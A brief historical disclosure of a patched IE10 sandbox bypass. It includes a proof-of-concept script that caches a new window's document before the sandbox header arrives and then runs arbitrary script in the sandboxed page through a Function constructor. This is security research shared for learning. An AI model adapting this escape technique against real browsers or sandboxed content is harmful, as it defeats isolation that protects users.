IE10 Sandbox HTTP Headers Bypass via Cached Document Object

The IE10 sandbox could be applied not just through the sandbox HTML attribute but also via the X-Content-Security-Policy HTTP header. This bypass worked by capturing the new window’s document object before the sandboxing header arrived — at that point the document was still fully accessible — and then using the cached reference after the page had loaded and the sandbox was in effect.

<script>
function main()
{
    win = window.open("sandboxed.aspx"); // page sends X-Content-Security-Policy sandbox header
    doc = win.document; // accessible before the header is read
    setTimeout("accessWindow()", 2000);
}
function accessWindow()
{
    doc.body.insertAdjacentHTML('beforeEnd', '<span style="color:red;font-size:20pt">This text was written from my opener.</span>');
    doc.execCommand.constructor('alert("Wow! This alert is being executed in the Sandboxed window!")')();
}
</script>
<input value="Open Window with Sandboxed Headers" type="button" onclick="main()" />

The cached doc reference bypassed the sandbox entirely. Using doc.execCommand.constructor(...) obtained a Function constructor in the sandboxed window’s context, allowing arbitrary script execution there. The timing relied on the fact that the document object was handed out before the security header was processed.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.